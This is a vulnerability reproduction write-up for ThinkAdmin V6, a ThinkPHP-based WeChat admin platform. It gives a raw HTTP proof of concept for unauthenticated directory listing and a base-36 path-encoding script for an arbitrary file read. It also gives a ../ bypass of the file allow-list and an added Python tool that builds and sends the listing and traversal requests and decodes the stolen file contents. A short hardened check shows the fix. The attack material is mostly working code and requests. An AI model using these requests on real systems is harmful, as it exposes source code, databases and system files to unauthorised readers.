ThinkAdmin V6 vulnerability reproduction
1. Introduction
ThinkAdmin is a WeChat back-end management platform built on ThinkPHP.
2. Affected versions
ThinkAdmin V6
3. Reproduction
Unauthenticated directory listing:
POC:
POST /admin.html?s=admin/api.Update/node HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 22

rules=%5B%22.%2F%22%5D
1. For the directory listing, note that the value of the rules parameter in the POST body must be URL-encoded: the body above decodes to rules=["./"], i.e. a JSON array of the directories to list, and the endpoint answers without any authentication.
Arbitrary file read:
Affected: ThinkAdmin V6.0 <= 2020.08.03.01
Check the target's version first.
POC:
/admin.html?s=admin/api.Update/get/encode/xxx
Path encoding script (the original calls this "encryption"; it is only an encoding: every byte of the path is written in base 36):
import sys


def baseN(num, b):
    """Write the non-negative integer num in base b (b <= 36), lowercase digits."""
    return ((num == 0) and "0") or \
           (baseN(num // b, b).lstrip("0") + "0123456789abcdefghijklmnopqrstuvwxyz"[num % b])


def poc(url):
    # The URL is taken from the command line only for the usage text below;
    # the script prints the encoded path, and the request is sent by hand (step 2).
    while 1:
        s = input("Enter the path of the file to read: ").encode('utf-8')
        if s == b'exit':
            sys.exit(0)
        try:
            poc = ""
            for i in s:
                poc += baseN(i, 36)  # each byte of the path becomes its base-36 form
            print(poc)
        except Exception:
            pass


if __name__ == "__main__":
    if len(sys.argv) == 2:
        poc(sys.argv[1])
    else:
        print("""ThinkAdmin v6  By: yuyan-sec
    [ThinkAdmin v6 arbitrary file read]
    Usage: python poc.py [URL]
           python poc.py http://127.0.0.1
""")
1. First run the encoding script to obtain the encoded string for the file path.
2. Put that string into the encode segment of the URL above. Reading /app/admin/controller/Config.php succeeds; the response shows the file as a base64-encoded string, which has to be base64-decoded to get the source.
3. Trying to read other files directly, such as /app/data/data.sql or /etc/passwd, fails, because the endpoint only accepts paths from an allow-list:
config
public/static
public/router.php
public/index.php
app/admin
app/wechat
The check can be bypassed with ../ directory traversal: start the path with one of the allowed entries and climb back out of it.
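The two requests above (the rules body for api.Update/node and the encoded path for api.Update/get), with the decoding of the reply and the traversal bypass, as one added example. This is not code from the page or from the ThinkAdmin project. Assumptions not stated on the page: each byte is padded to two base-36 characters (the page's script does not pad, which only matters for bytes below 36, none of which occur in a normal path); the JSON reply carries the base64 body under data.content; and the allow-list is a plain string-prefix check, which is what a ../ bypass implies. The sample reply is constructed, not captured. The vulnerable_allow_check/hardened_allow_check pair models that assumed check and its fix and is not the project's own code.

```python
"""Request builders for the ThinkAdmin V6 node/get endpoints discussed above.

Added example; not code from the page or from ThinkAdmin. Field names,
padding and the shape of the allow-list check are assumptions (see lead-in).
"""
import base64
import json
import posixpath
import urllib.parse
import urllib.request

DIGITS = "0123456789abcdefghijklmnopqrstuvwxyz"

# Allow-list as quoted on the page.
ALLOWED_PREFIXES = ["config", "public/static", "public/router.php",
                    "public/index.php", "app/admin", "app/wechat"]


def to_base36(n):
    """Non-negative integer -> base-36 string, same alphabet as the page's script."""
    out = ""
    while n:
        out = DIGITS[n % 36] + out
        n //= 36
    return out or "0"


def encode_path(path):
    """Encode a path for the 'encode' URL segment: every byte as two base-36 chars (padding assumed)."""
    return "".join(to_base36(b).rjust(2, "0") for b in path.encode("utf-8"))


def decode_path(encoded):
    """Inverse of encode_path; handy for reading what a logged request asked for."""
    raw = bytes(int(encoded[i:i + 2], 36) for i in range(0, len(encoded), 2))
    return raw.decode("utf-8")


def node_request_body(dirs):
    """POST body for admin/api.Update/node: rules is a JSON array, then URL-encoded."""
    return urllib.parse.urlencode({"rules": json.dumps(dirs)})


def get_request_url(base_url, path):
    """URL for admin/api.Update/get with the encoded path in the path-info segment."""
    return base_url.rstrip("/") + "/admin.html?s=admin/api.Update/get/encode/" + encode_path(path)


def traversal_path(target, prefix="public/static"):
    """Start with an allowed entry, then climb out of it with one ../ per component."""
    depth = len([p for p in prefix.split("/") if p])
    return prefix + "/" + "../" * depth + target.lstrip("/")


def vulnerable_allow_check(path):
    """Assumed shape of the flawed check: a prefix test that never normalises the path."""
    return any(path.startswith(p) for p in ALLOWED_PREFIXES)


def hardened_allow_check(path):
    """Normalise first, compare whole components, refuse anything absolute or climbing out."""
    parts = posixpath.normpath(path).split("/")
    if parts[0] in ("..", ""):
        return False
    for allowed in ALLOWED_PREFIXES:
        aparts = allowed.split("/")
        if parts[:len(aparts)] == aparts:
            return True
    return False


def extract_content(response_text):
    """Take the base64 file body out of the JSON reply (key names assumed) and decode it."""
    data = json.loads(response_text)
    return base64.b64decode(data["data"]["content"])


# Constructed sample reply, not captured from a real target.
SAMPLE_RESPONSE = json.dumps(
    {"code": 1, "info": "success",
     "data": {"content": base64.b64encode(b"<?php echo 1;").decode()}})


def fetch(url, body=None):
    """Send one request; only used from the command line, never at import time."""
    data = body.encode() if body is not None else None
    req = urllib.request.Request(url, data=data, headers={"User-Agent": "Mozilla/5.0"})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8", "replace")


if __name__ == "__main__":
    import sys
    base = sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1"  # placeholder host
    print(node_request_body(["./"]))  # identical to the body in the listing POC
    print(get_request_url(base, "/app/admin/controller/Config.php"))
    print(get_request_url(base, traversal_path("app/data/data.sql")))
    print(extract_content(SAMPLE_RESPONSE))
```

Whether the target expects the path with or without a leading slash, and how many ../ are needed to reach a file such as /etc/passwd outside the application root, depends on the deployment; traversal_path only shows the shape of the bypass. The hardened check is the fix a reviewer would ask for: normalise with posixpath.normpath, reject results that begin with .. or /, and compare path components rather than string prefixes.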
----------------------------------------------------------------------------------------------
References: https://github.com/zoujingli/ThinkAdmin/issues/244
https://github.com/yuyan-sec/goTools/tree/master/ThinkAdmin